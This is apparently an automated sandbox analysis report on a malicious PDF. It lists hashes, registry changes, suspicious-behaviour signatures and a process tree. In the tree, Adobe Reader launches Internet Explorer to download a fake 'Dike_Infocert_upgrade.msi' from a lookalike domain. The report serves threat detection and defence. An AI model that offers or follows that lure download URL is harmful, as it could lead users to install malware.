Analysis
-
max time kernel
119s -
max time network
140s -
platform
windows7_x64 -
resource
win7-en-20211014 -
submitted
19-10-2021 11:13
Behavioral task
behavioral1
Sample
107dd74c22fc6dbb829ac57dd99bf621887cccbbd8af6c88adbe08e1e15a3755.pdf
Resource
win7-en-20211014
General
-
Target
107dd74c22fc6dbb829ac57dd99bf621887cccbbd8af6c88adbe08e1e15a3755.pdf
-
Size
166KB
-
MD5
6b09106a8d4839ebb9555bba8aeff0c2
-
SHA1
953ee746472e54e3a5fb3174975305afa51dc01b
-
SHA256
107dd74c22fc6dbb829ac57dd99bf621887cccbbd8af6c88adbe08e1e15a3755
-
SHA512
bd9f8fcb0cc2f640377bbff67bfeedc8f4e9a71e629b54e3b29a20301bbfbdaf32f0b104aed66a518647893acaacd734a951fa564c51c42a7b0a17640790a755
Malware Config
Signatures
-
Processes:
iexplore.exeIEXPLORE.EXEdescription ioc process Key created \REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 005bca32ebc4d701 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000\Software\Microsoft\Internet Explorer\DOMStorage\drivehq.com IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{574DACC1-30DE-11EC-8392-52886B4C53F4} = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000005bf5749d3a275447873d564a46cb193600000000020000000000106600000001000020000000e67654ab719dbe87e6852a372c790492204ec31b70123f98eeb8c85c79131e7a000000000e80000000020000200000003b3db435f4549ffa8dd82a5a00aa3e8088c262e77cd9223f93ab97677bead32f200000009685a9e6eae5f109d7a9f2c381c0f803678e2070eb313c7c966426bfede52e6c4000000071c0d1b1fe072f59a0795710d5515fba74989ee64a1806bd2c459b32fd4a4df3241f61350a84f4150ae05d0eec67ce61582fee78019a6169b23ea7ccb18a1b5f iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000\Software\Microsoft\Internet Explorer\DOMStorage IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000\Software\Microsoft\Internet Explorer\DOMStorage\drivehq.com\NumberOfSubdomains = "1" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "341414180" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000005bf5749d3a275447873d564a46cb1936000000000200000000001066000000010000200000005e602f8ae3cefb2f2da576b4abf245b061aa58cad1dd39683d7b59beb3797a16000000000e80000000020000200000005b2532ffe1dfb2dc0d38b4e5b0ccabde97f83e39947e5136f89caca59f12fade9000000060223d4c500fa488211f7f162a598b2db7ba776bd54d1a9315e4a93b854994a6a833cae32c99a4ed8e4d1e20b101193552369bcac8193474c0f140c68b42ff647aa39a97a49eda3fe3d4ee2e73562746022f736d56b5130029ed72f59b64d9726277b3b687c5edcb6840a28106d2ab06caec378e5cab85cf3753ec55b44a459effb85597086ddc7f1815c7ed4069ee3f400000004bc9200b72dba166be251e72fca2e76d49ec4991118579a4b8c0194437fd6f79c1daaa09eb6b9024cac113a6ad51dd1b9d19bc6d4fcf6096c4027a845e55c7fd iexplore.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
AcroRd32.exepid process 1328 AcroRd32.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
iexplore.exepid process 1500 iexplore.exe -
Suspicious use of SetWindowsHookEx 10 IoCs
Processes:
AcroRd32.exeiexplore.exeIEXPLORE.EXEpid process 1328 AcroRd32.exe 1328 AcroRd32.exe 1328 AcroRd32.exe 1328 AcroRd32.exe 1500 iexplore.exe 1500 iexplore.exe 392 IEXPLORE.EXE 392 IEXPLORE.EXE 392 IEXPLORE.EXE 392 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 8 IoCs
Processes:
AcroRd32.exeiexplore.exedescription pid process target process PID 1328 wrote to memory of 1500 1328 AcroRd32.exe iexplore.exe PID 1328 wrote to memory of 1500 1328 AcroRd32.exe iexplore.exe PID 1328 wrote to memory of 1500 1328 AcroRd32.exe iexplore.exe PID 1328 wrote to memory of 1500 1328 AcroRd32.exe iexplore.exe PID 1500 wrote to memory of 392 1500 iexplore.exe IEXPLORE.EXE PID 1500 wrote to memory of 392 1500 iexplore.exe IEXPLORE.EXE PID 1500 wrote to memory of 392 1500 iexplore.exe IEXPLORE.EXE PID 1500 wrote to memory of 392 1500 iexplore.exe IEXPLORE.EXE
Processes
-
C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\107dd74c22fc6dbb829ac57dd99bf621887cccbbd8af6c88adbe08e1e15a3755.pdf"1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1328 -
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://infocert-dike.firstcloudit.com/download/aggiornamenti/Windows/Dike_Infocert_upgrade.msi2⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1500 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1500 CREDAT:275457 /prefetch:23⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:392
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
MD53e1f81568a2d757ce2837fe7c4ef6532
SHA10f7f437180a4ce3d2c68942fbb759254e07a314d
SHA256bfa749a0c488b16fafe60c0d69d1a6aafa3036e865a5bb39c637ee6e51170f2b
SHA51292bc01d75fb2d8e22fe235562a419ca56013823fdc1636749809265df03d1c85b0063ca1bccc2c178c018c298b4715525e022b8f826e0952dc74ee46359e9a75
-
MD5
54a2d5a6213f60f206bd8854991fa879
SHA16f86c9878a997fdd2aac56657742674fdfe4c831
SHA256085acbabb33f99eab6cd4bd59526c73d704f03c117106239237c9a8c75b0b5b5
SHA51229420e7d801881732e13deb4ac0e88bf6c80024350fc4e07cb29d6166503dfab1d9289111d6094c33285da5bb54c43379bd148f0ad5ad6fd8cf012b0e819aba1
-
MD5
2f8d8ed0f5ad58559d1ac7a181842e7d
SHA1114d2bf6ad79ab18c924b54dcaa88bf89b958751
SHA256a467a3ff73a56a14b7b207fef0eb663c7764256d4b57d0507b0159c2fd927336
SHA5127a82c504826588dda2be2bcdfd7dd03c99290ff7e400cf4a8e90af25cd96cd9240f99ce2db289c50fed258bcf30fc6289cfb62826c67311ea08e9ff716500a82